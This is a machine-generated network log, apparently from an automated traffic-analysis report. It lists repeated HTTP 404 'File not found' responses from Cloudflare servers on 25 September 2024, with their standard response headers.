                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fK2RM5PWl1J5HxnKG0eWViQUWiYqlPr3UGl01tZMMi%2BBeNaCHsxH8nIaCWnvnZebEJ0iPXxL%2BIbI0Ng2EdezEIj6e9I8kza8JoKrC3lpff8dZXECN1tYLKO2MhGveQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5dfdbe3042b8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNHxEu56BqMc%2B0HauuSMY%2BuW%2FD0lLlQxpViBld4mgJxB72bgutf3qKqjcrqqUo83r6etEklbNPACNycFAh2LTNc%2BOpQqGA352yEetfU%2F8BAyoNhmnOCJqgAWVIprbA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e02ee2f8ca7-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XakXjrUnVeAgqmgC5%2FOfD75JRQ9z7QVKCf26saeaVseH2nnb2qiHcwPNG2zWWFacXWd%2FFHLh%2BZVZ2YGVvs2cvdAZU8PU5Ebe4LUFNOQIMJCtbGAVWkNz3ueQpq%2FL4A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e085b457289-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jTYITKKHkauu3KDROcd%2BiPro8JhJ97YcMyYfM3aBEHHZOnkyh2FJVsu%2BwPvelkrGcWgVCVAkAhhnV73QV%2Fo1zdaM3dEumdtCer3J608Ib5jgiY3aLUlac2n1Sfpb3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e0d6bef0f39-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RjMp8iH0DNwHyBAZQS6GAebhWVVFx44WQZ1vNyeLy00TDJwv2eSSXHptCQlsamiKOUUY80Qw1The5UPuAqbOR9VBT%2BMwGrQBWGXwOQfVWkVweU76GLO9nm%2FoiELqig%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e14dccf330c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m1PxUuy2BGXTEkxt9DC5snAPMQ6eOR2yLIr3ecQ%2FQlv2yHHOpP7kujSsPh1X9%2BZS6n9clX1%2FEJvy9LbsJUiIDhxq3hVoU%2BHoKV830jVOPhcl2UMqDSFbKOExq7Q8qg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e1ae8327d1a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQ51Gmp0eDgLj7ztwEM3HDSYqW5yek9MwLJS70Oev2qyMeHSK81%2Fo68FvqiaEHd6xkza1pnG%2B6%2F4hNruuSII5ZukMevtzLW4pk4tfPyk%2BSwmhOLGGtcvyv9Gk5NVAQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e1ffbd6c443-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g34fbR2gKMzgdlcFVB4ONhC4jVCb79W9gEKBhireFB%2FvgYCOno7mxvPguLY40M5EzTuQQYsBfHVFIR6ms8eNEbhmVnKj2PIJ3iP%2B2ojO1O5YgfN9Ctk12DY1SEcTIQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e254d7542fc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oku57ku%2ByhJ4L4Zy2FXfxr0sbjlHCxj0gmtVxqb4yHalViOhEE0Vv9UfFE%2FDmgkMagKtL6%2BIVqFNVcMDD6H1%2FWSovzXyOVJcilbXgspbTRT6hbZoAIrT0XSJei7FHA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e2a89394396-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O5BC95%2FKCnA29OJK8ckki9PlYQ2A2Q6eVH3bHNTfaqUZPqyi7nf6a9TYlcg%2FDSS%2B2BdQMB5oGYV9ALGSJR1O0h%2BLajNhJyW4HrKzPM%2B8l6vqUgsUKhpZFkrib30E5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e2ff84872a1-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7RreTgmB4WA%2FmyEd44IMkIL7CV25qUh59a7dPeDaZh8T%2Fl6Oeil8k03ANkZCzPykUZAC4SzsK6WEpONZXC5xpHOdShTdO73zmVd1J9VQTtWN1I5w24ZGWVCCNtbEuw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e35ded941fb-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FTHGSZSAC5ZMaC%2FlEVWQj4QqZjh8h%2FoxLIxIjVxPM1uhMvmcxXs%2FryvjtXTbYlItwxrm9%2BdXLiVG%2FLlLfoeLDhqlTFeJXVDa1ZQeBv%2BmVxT250H1Ch6YQ0ryAScoCw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e3b3b098c0c-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1u8IGhvgWyjhBseK%2FwiAxUHc2VKiV4Behkp1PlnWUhsX2%2Bq%2F1%2F7YU4gFPksSLrjtfrKhCkWOz34r0BZ0vSlxKMHuCc7sbB5QG%2Bgs%2FYldrYZJOkR2EURU1c7qpQjZgw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e407c450f89-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e461b2819ff-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i3ClZajjkQSsMULnANdt8VOnMPk0SfIuJfrt6wKTh3RnhxS950dIB%2FFZMSSWTTw442HMevCgLFQ0BOAerKe9aLhz58wBbl57rweZN1R45k9s%2B6xTKVxcqXLS%2FJltwQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e461b2819ff-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e4eea8a4304-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e4eea8a4304-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xnoBuli1KhNTBCVJXad04WA57t6rBO3BmdRs7XnwClcoUXs764U%2FOy61Ak3%2FMgXX5zDQD67S0IdYQtiOX2GDfJt4htpoPPEeLN%2FbM%2BKjBTD1hrNjljRWa2gY%2BU%2FroA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e4eea8a4304-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e590fea0ccd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lslfODFSnBd%2FBVhYRtxsPhy6K02pDv7T32TBi5q9T3LYDz%2BnQXDOwNoLI27wQwMf6JmPWmKUmBdqm%2BuYC8x1RSd720vmMsywQrrwxtg1t8JMeIqRtDVal7yw01jg%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e590fea0ccd-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1dH38UhiplB%2BKC1guJFoTrPPqv9hzw5u2HlCLKSpCNPZZ4je7XsKE9TaAAP23QE5Qu6PAC1bQg7qmig7zTjtlow8z5P3WvGB8NJgPtcBQaqv1J5whiGsycSJBw2IZg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e60cb8a8ce6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IGqraZ39hxAzqnvc1fjL7B4Qf0Wwu%2FbUhlgEYgHY1R6psG0TnCIQTf829QaSd8GoB4jfDVFjlRTd0J5AFeQz19oXRNAwknIVKXVPERYWBcJ2c4qiyz%2FekbEjdyDr9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e66bf1a7d13-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FBwcTQcWI8shv%2BlA%2F0avvtZx3u2ONid8f7hG3sSZQEzgbYPWFyEXA%2FpKv2eQWHyP5o9AcAktLbekrQ0XzF%2B7kQj%2Fig9Kml8HSKQ9eJw2BEDloEDutOKWE0zM3lNEkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e6c0a070cb2-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kI1XESc1wi8jPwRyP84%2FaTmUd%2Fj7GN7vfKV2xCgFs85v5esFnqPZw%2FpB8wNPeWCaP%2FYIVHWNe1THZTA%2FH%2BoHB0ocOXN%2Bsxbrdu7eT9Pf41YbYhiXw9H4%2BlYZz0kGDg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e714c047d0b-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X3iKez7FxuroCVNRX6FaGNYn9oxH1uAVRcioJs1Dlbfb3QomUEts1S9ZDtFM01tQzQ6RPrjFUnXwVQ7E4NguSVGbjA9yUUHqWslbrVQ68shPtKXISPA6s%2F6X7EOAYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e76ff5578ed-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9wbloxdmDJNXRmk9OyVX9iQ%2FEtYsxAY2utKgVavgzCu9SfgETva8mLu1zcbJBw%2BSCPJjafTp36Ck7KxHQbGYgOuve7gt0YsCDh442%2B20leZLDCWZjv6LSaoLeB%2FWJw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e7c2cda1799-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hodOlnVk3u1i1qXWzCSAoHFe56cWXGQa3ddr2hNSB9aqGO1fXwZJ5FOriLIiCmKKZx5bjdgi3QtpNOuE8M8AaEYRM8MHxr3ryNVmcDWktmim70Ctfnp0ExIaFkvmxw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e8188c91a13-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ltEvnr7FeL1qfB82ayyIpGcfjt9099syS7SswFV3e9JoF2NuOSJY6JpGv2W2jp8EJvYIDr%2BQkGa4v1syw6jabknAS%2FGMY%2FYjLVXB376bq67TV%2FoZ%2FmHdTgJvtVSKOg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e86bf1d42b0-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WU21y9%2BryG%2FXStViqGpAf3iblzWtvONAx47m5C4CO%2FYu938%2FlOUH8Bxr7EJwRngQIZQVOeRgjxe3UHLBPVG%2F83oO8LBoWE6d00sZJENB%2BcPYweGZDEOAHrp5YoZrlw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e8c0f638c5f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zLGSQL5A8e8gHtquLdZ7r%2Fv2r6h4w%2BMqBDqSXvsCPi4FkDYzRWCgCyG2XeHXeQ%2Bf923k4v%2F9hTXlLfrJlCZ4B5nH01E%2BL1b8UEW1q70RmHyCkz3LqrwSrfaOW73Q5A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e919b83c341-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kZg7h6ySacjJ75kQbxcFnVBDLTVkZdsvr0qlI4GzH%2BBVBFyv1wrh9LCUgVjpwUEjyL9ByW1WnJhb0fhRYG2VvCrrAjXvcm%2B3P4j0q0Xgl%2Fg4tznO%2BpKYlT%2F6UTBwXQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e983b980ca0-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:30:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kD5ayhKGPLcWtu32TkF%2FW2gNGZlu4xE13IUEGQiHUbTfNH%2FkMn%2FCT5qhkALNyktKvWgH9SpMro1AK6rOPLQMah78N2%2BLzSBvH3Fqnm086GVNr%2BbLMuhIUbdz7a8srw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5e9d9d415e82-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
